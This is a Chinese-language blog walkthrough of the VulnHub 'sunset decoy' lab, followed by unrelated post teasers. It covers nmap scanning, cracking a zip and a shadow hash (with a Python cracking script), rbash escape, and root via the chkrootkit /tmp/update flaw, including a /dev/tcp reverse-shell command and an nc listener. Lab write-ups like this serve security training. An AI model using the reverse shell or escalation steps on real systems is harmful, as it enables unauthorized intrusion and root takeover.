当前位置：首页 > news >正文

vulnhub：sunset decoy

news 来源：原创 2025/9/18 8:05:22

靶机下载地址https://www.vulnhub.com/entry/sunset-decoy,505/

渗透过程

简单信息收集

nmap 192.168.56.0/24 -Pn
# 确定靶机ip：192.168.56.121
nmap 192.168.56.121 -A -T4
# 得到开放端口22,80

在80端口得到save.zip，需要密码解压。

john破解压缩包密码

zip2john save.zip > hash.txt
john hash.txt

得到密码manuel。

shadow密码破解

解压后得到/etc/文件夹，内有shadow文件，尝试破解用户密码。

root外存在用户296640a3b825115a47b68fc44501c828

296640a3b825115a47b68fc44501c828:$6$x4sSRFte6R6BymAn$zrIOVUCwzMlq54EjDjFJ2kfmuN7x2BjKPdir2Fuc9XRRJEk9FNdPliX4Nr92aWzAtykKih5PX39OKCvJZV0us.:18450:0:99999:7:::

密文是$6开头，所以加密方式是SHA-512。

网上找到一个破解脚本。

# coding=utf-8
import crypt

shadow_file = "/etc/shadow"                   # 获取系统密码路径
password_file = "/usr/share/wordlists/rockyou.txt"    # 自己的密码文件，里面放的是明文密码


def get_pass(shadow_file):used = {}                           # key是用户，value是对应的密文f = open(shadow_file, "r")        # 读取系统密码文件userline = f.readlines()            # 将该文件转换为列表格式f.close()for item in userline:                  # 遍历列表里的内容if len(item.split(":")[1]) > 3:    # 以":"分割，取第二个元素的长度，也就是完整密文值的长度，如果大于3，我们认定它有密码，把它取出来used[item.split(":")[0]] = item.split(":")[1]  # 我们将取出的密文给了相应的用户，这里的used[i.split(":")[0]]是字典的key,也就是系统中的用户名，后面的i.split(":")[1]是用户名后的加密密文return used


# 提取自己的密码文件中的明文密码
def look_d(password_file):f = open(password_file, 'r')mwlist = f.readlines()              # 将读取的内容转换为列表f.close()for i, item in enumerate(mwlist):mwlist[i] = item.strip("\n")    # 去除每一行的换行符return mwlist  # 返回这个列表


# 根据密文是否相同判断出对应的用户和密码
def main(user_passfile, zidian):used = get_pass(user_passfile)      # 获取用户和对用的加密密文mingwen = look_d(zidian)            # 获取所有的明文密码for user in used:passwd = used[user]             # 一次遍历每个用户的密文salt = "$6$" + passwd.split("$")[2]  # 获取盐值for passwdmw in mingwen:        # 遍历系统中的每个完整密文if passwd == crypt.crypt(passwdmw.rstrip(), salt):  # 如果我们猜想的密文与系统中的密文相同，输入它的用户名和密码print("userName:%s passWord:%s" % (user, passwdmw.rstrip()))


if __name__ == "__main__":main(shadow_file, password_file)

get密码：server

rbash逃逸

ssh远程登录后发现是rbash，即restricted shell，受限制的bash，体现为

不能使用cd命令。
不能使用>,<>,>>等重定向操作符。
不能设置或取消环境变量。

rbash逃逸有很多种方式，这里测试后适用的是ssh登录时逃逸（借助-t远程在远程机器上运行脚本）

ssh 296640a3b825115a47b68fc44501c828@192.168.56.121 -t "bash --noprofile"# 不加载用户配置
# -t "bash --noprofile"

rbash逃逸成功后发现仍、cat、vim等命令依旧无法使用，

需要配置环境变量。

export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

完美解决，get user.txt。

用户目录内容如下：

存在一个root用户创建的honeypot.decoy可执行文件，他有8个功能，其中除选项五之外都是简单易懂的功能，选择选项五后无回显，不清楚具体作用。

rbash逃逸部分参考rbash逃逸大全-先知社区 (aliyun.com)

chkrootkit提权

SV-502/目录下的logs文件中发现一个可疑点，chkrootkit，这是一个后门检测工具。

搜索发现，chkrootkit 0.49版本有漏洞。searchsploit漏洞库搜索一下，searchsploit chkrootkit，锁定到33899.txt。

了解后知道，满足两点即可利用该漏洞获取root权限：

如果目标机器管理员会定期运行chkrootkit。
非root用户对/tmp/目录有写权限。（可以再该目录下创建有执行权限update文件）。

此处具体提权流程如下：

在tmp目录下创建update文件，并写入反弹shell。

touch /tmp/update

chmod +x /tmp/update

echo "bash -c 'exec bash -i &>/dev/tcp/ip/4444 <&1'" > /tmp/update

运行chkrootkit，首先查看是否有这个定时任务❌；想到用户目录下那个可执行文件honeypot.decoy，执行后有8个选项，其中第五个选项意味不明Launch an AV Scan.，但是根据Scan有理由怀疑该选项就是执行chkrootkit。简单测试一下，选择选项五后使用ps -aux | grep chk验证发现运行了chkrootkit✔️

因此，提权操作如下：

# 靶机
./honeypot.decoy
5
# 攻击机
nc -lvvp 4444

提权成功。

vulnhub：sunset decoy

靶机下载地址https://www.vulnhub.com/entry/sunset-decoy,505/ 渗透过程简单信息收集 nmap 192.168.56.0/24 -Pn # 确定靶机ip：192.168.56.121 nmap 192.168.56.121 -A -T4 # 得到开放端口22,80 在80端口得到save.zip，需要密码解压。 john破解压缩…...

编程日记 2025/9/18 8:05:22

MySQL日期时间类型详解：DATE、TIME和DATETIME的用法与区别

在数据库设计中，正确处理日期和时间数据是至关重要的。MySQL提供了多种数据类型来存储时间信息，其中最常用的三种是DATE、TIME和DATETIME。本文将详细介绍这三种类型的特性、区别以及实际应用场景。一、基本数据类型介绍 1. DATE类型用途&#xff1…...

编程日记 2025/9/11 13:07:57

js异步机制

1、什么是异步机制？为什么js需要异步机制？ 异步机制和同步机制是相对应的，异步是指：当代码按照顺序执行到一些比较耗时的操作，不会立刻执行，而是将这些操作推到一个队列中等待合适的时机从队列中取出任务执…...

编程日记 2025/9/14 4:11:47

Pycharm常用快捷键总结

主要是为了记录windows下的PyCharm的快捷键，里面的操作都试过了功能描述会增加备注。文件操作快捷键功能描述Ctrl N新建文件Ctrl Shift N根据名称查找文件Ctrl O打开文件Ctrl S保存当前文件Ctrl Shift S另存为Alt F12打开终端（Terminal&…...

编程日记 2025/9/11 4:51:35

巧记英语四级单词 Unit2-下【晓艳老师版】

mit传递（send 送）、 superiority n.优势，优越性超越别人的东西就是自己的优势govern v.统治 government政府统治的机构administer v.管理，治理 minister 大臣部长，mini-小人，一再的做大臣部长&#xf…...

编程日记 2025/9/15 4:46:42

走进底层 - JVM工作原理入门指南

走进底层 - JVM工作原理入门指南 Java 之所以能够实现“一次编写，到处运行”（Write Once, Run Anywhere, WORA），核心在于 Java 虚拟机（JVM, Java Virtual Machine）。JVM 是 Java 程序的运行环境&#xff0c…...

编程日记 2025/9/8 9:55:29

windows 10频繁通知A字“出现了问题，无法安装功能。”

一、故障突现 windows 10频繁通知A字“出现了问题，无法安装功能。” 编辑文档时发现黑体、楷体gb_2312等常用字体，在字体列表中失踪，原来设置好的字体也显示失效。二、起因分析回想了一下，是3月27日安装了 2025-适用于Windows…...

编程日记 2025/9/15 10:10:38

基础环境配置

1.GitGerritjenkins Linux 远程登录 | 菜鸟教程 https://zhuanlan.zhihu.com/p/22766058062 2.Samba 配置 3.软件安装 （1）MobaXterm （2）Vscode （3）Xmind （4） Audacity Aud…...

编程日记 2025/9/11 1:17:17

ROS2——foxy apt打包离线安装deb包

需要从A设备复制ROS2环境到B设备，且B设备有可能没网络，所以选择制作离线资源包 1. 本机安装指令本机环境ubuntu20.04，安装ros2-foxy版本，直接输入以下指令，基本不会遇到问题这里安装的是ros-base版本，不…...

编程日记 2025/9/11 12:37:39

大数据学习（104）-clickhouse与hdfs

🍋🍋大数据学习🍋🍋 🔥系列专栏： 👑哲学语录: 用力所能及，改变世界。 💖如果觉得博主的文章还不错的话，请点赞👍收藏⭐️留言📝支持一…...

编程日记 2025/9/10 0:30:55

大数据 - 1. 概述

早期的计算机（上世纪70年代前） 是相互独立的，各自处理各自的数据上世纪70年代后，出现了基于TCP/IP协议的小规模的计算机互联互通。上世纪90年代后，全球互联的互联网出现。当全球互联网逐步建成（2000年左右&…...

编程日记 2025/9/16 5:59:17

CD25.【C++ Dev】类和对象(16) static成员(上)

目录 1.static成员变量问题:实现一个类,计算程序中创建出了多少个类对象设计思路代码示例版本1 版本2 static成员特点1.static成员为静态成员,为所有类对象所共享(在某种程度上可以理解为全局的,用类去封装"全局变量"),存放在静态区,则不属于某个具体的…...

编程日记 2025/9/11 7:01:25

C语言今天开始了学习

好多年没有弄了，还是捡起来弄下吧用的vscode 建议大家参考这个配置 c语言vscode配置 c语言这个语言简单，但是今天听到了一个消息说python 不知道怎么debug。人才真多啊...

编程日记 2025/8/17 23:43:51

Mockito如何对静态方法进行测试

在 Mockito 中，直接对静态方法进行模拟是困难的，因为 Mockito 的设计理念是优先通过依赖注入（DI）管理对象，而静态方法破坏了这种设计（难以解耦）。不过，从 Mockito 3.4.0 版本开始，通过 mockStatic 方法支持了对静态方法的模拟（需配合 mockito-inline 依赖）。从 Mo…...

编程日记 2025/9/9 7:47:13

Three.js 入门实战：安装、基础概念与第一个场景⭐

学习本章节你不必要追求细节，你只需要了解基本的3D场景需要哪些元素组成，如何通过组成3D场景的元素属性调整来控制3D物体或者场景即可。在上一篇文章中我们初识了 Three.js，今天我们正式进入实战环节 🎯 前置准备： …...

编程日记 2025/9/10 15:14:09

【QT】QT的消息盒子和对话框（自定义对话框）

QT的消息盒子和对话框（自定义对话框） 一、消息盒子QMessageBox1、弹出警告盒子示例代码：现象： 2、致命错误盒子示例代码：现象： 3、帮助盒子示例代码：现象： 4、示例代码： …...

编程日记 2025/9/11 7:11:07

QT面试题：内存管理与对象生命周期

题目： 在Qt中，当一个父对象被销毁时，其子对象是否会被自动释放？请结合Qt的内存管理机制说明原因，并解释在什么情况下可能导致内存泄漏。如何避免这类问题？ 参考答案父子对象的内存管理机制 …...

编程日记 2025/9/10 15:20:25

linux查询inode使用率

在 Linux 中，inode 用于存储文件和目录的元数据（如权限、所有者、时间戳等）。当文件系统的 inode 被耗尽时，即使磁盘空间充足，系统也会提示 No space left on device。以下是查询 inode 使用率的详细方法： …...

编程日记 2025/9/5 13:25:42

算法基础—二分算法

目录一、⼆分查找例题 1 牛可乐和魔法封印 2 A-B 数对 3 烦恼的高考志愿二、⼆分答案 1 木材加⼯ 2 砍树 3 跳石头⼆分算法的原理以及模板其实是很简单的，主要的难点在于问题中的各种各样的细节问题。因此，⼤多数情况下，只是背会…...

编程日记 2025/9/8 8:53:14

2024年第十五届蓝桥杯CC++大学A组--成绩统计

2024年第十五届蓝桥杯C&C大学A组--成绩统计题目： 动态规划， 对于该题，考虑动态规划解法，先取前k个人的成绩计算其方差，并将成绩记录在数组中，记录当前均值，设小蓝已检查前i-1个人的成绩&…...

编程日记 2025/9/13 7:17:56

家居实用品：生活中的艺术，家的温馨源泉‌

在快节奏的现代生活中，家居实用品不仅是日常所需的工具，更是营造温馨家居氛围、提升生活品质的关键元素。它们以其独特的魅力，默默地融入我们的日常生活，成为连接物质世界与精神世界的桥梁。走进家门，首先映入眼帘的或…...

编程日记 2025/9/11 17:21:27

TCP重传率高与传输延迟问题

目录标题排查步骤：TCP重传率高与传输延迟问题v1.0通过 rate(node_netstat_Tcp_RetransSegs[3m]) 排查 TCP 重传问题的步骤1. **指标含义与初步分析**2. **关联指标排查**3. **定位具体问题源**4. **解决方案**5. **验证与监控** v2.0一、基础检查二、网络层分析三、…...

编程日记 2025/9/15 3:06:02

超越简单检索：探索知识图谱与大型语言模型的协同进化之路

摘要: 大型语言模型（LLM）在自然语言处理领域取得了革命性进展，但其在事实准确性、复杂推理和可解释性方面仍面临挑战，“幻觉”现象是其固有局限性的体现。知识图谱（KG）作为结构化人类知识的载体&#xff0c…...

编程日记 2025/9/15 4:46:45

汽车的四大工艺

文章目录冲压工艺核心流程关键技术焊接工艺核心流程涂装工艺核心流程总装工艺核心流程终检与测试静态检查动态检查四轮定位制动转鼓测试淋雨测试总结简单总结下汽车的四大工艺（从网上找了一张图，感觉挺全面的）。冲压工艺将金属板材通过…...

编程日记 2025/9/14 21:02:47

研发效能实践：技术评审会生存指南

文章目录 🚨‌开篇暴击：为什么你的评审会像「菜鸡互啄」？‌⚙️‌第一章：Google Design Sprint——5天把争议变成共识‌📅 ‌Day 1-5 实操手册‌‌Map the Problem（画地图）‌‌Sketch Solutions…...

编程日记 2025/9/15 0:12:15

js 拷贝

在 JavaScript 中，拷贝对象和数组时需要特别注意，因为对象和数组是引用类型，直接赋值只会复制引用，而不是实际的数据。以下是几种常见的拷贝方法及其应用场景： 1. 浅拷贝（Shallow Copy） 浅拷贝…...

编程日记 2025/8/30 18:23:06

AI比人脑更强，因为被植入思维模型【51】效率思维模型

giszz的理解：效率实际没有用，过分的追求效率，也是当下社会的弊病。但是效率思维，让我们能够用一个最简单的模型，去平衡投入和产出的最佳比例。过高的效率，会导致过大的压力，合适是最好的。一、…...

编程日记 2025/9/9 19:33:32

Spark RDD相关概念

Spark运行架构与核心组件 1.Spark运行梁构 spark运行架构包括master和slave两个主要部分。master负责管理整个集群的作业任务调度，而slave则负责实际执行任务。 dirver是Spark驱动器节点，负责执行Spark任务中的main方法，将用户程序转换成作业…...

编程日记 2025/9/12 21:56:02

每日一题（小白）数组娱乐篇21

由于题意可知我们是要将对应的数字转换为英文，我们要考虑两点一个是进制的转换，也就是类似于我们的十进制一到9就多一位，这里的进制就是Z进制也就是27进制一旦到26下一位则进位；另一方面要考虑数字的转换也就是1~26对应A~Z。解决上…...

编程日记 2025/9/7 1:26:44

LLM 的model.generate() 参数说明

LLM 的model.generate() 参数说明目录 LLM 的model.generate() 参数说明生成长度控制参数采样策略参数重复惩罚参数束搜索参数其他参数model.generate() 方法是 Hugging Face Transformers 库中用于文本生成的核心方法，它有众多参数可用于控制生成过程生成长度控制参数 min…...

编程日记 2025/9/13 1:25:36

每日一题——AB10 反转链表

ListNode* prev NULL;while(head) {ListNode* next head->next; // 先记住下一个节点head->next prev; // 把当前节点指向前一个prev head; // 前一个节点变成当前节点head next; // 当前节点移动到下一个}return prev; // …...

编程日记 2025/9/15 7:59:13

大模型备案语料安全要求解析

根据大模型备案法规要求及实践经验，我整理除了以下涉及到语料安全相关环节的要求，供大家参考，如果有大模型备案和算法备案的更多疑问，也可以和我沟通交流。一、关键词库规模与覆盖范围 1.基础规模企业需建立拦截关键词库&…...

编程日记 2025/9/11 18:28:33

【Ansible自动化运维】二、Playbook 深入探究：构建复杂自动化流程

在 Ansible 自动化运维体系中，Playbook 是极为关键的部分。它允许我们以一种结构化、可重复的方式定义和执行一系列复杂的任务，从而构建高效的自动化流程。本篇文章将深入探究 Ansible Playbook 的各个方面，助您掌握构建复杂自动化…...

编程日记 2025/9/14 16:00:57

unity 保存场景功能可以保存运行时候地形变化和动态生成得物体，点击加载进来后可以继续上次退出时得场景

直接上代码了 using System; using System.Collections.Generic; using System.IO; using UnityEngine; using UnityEngine.UI;[System.Serializable] public class TerrainSaveData {public int heightmapResolution;public float terrainWidth;public float terrainLength;p…...

编程日记 2025/9/8 1:30:31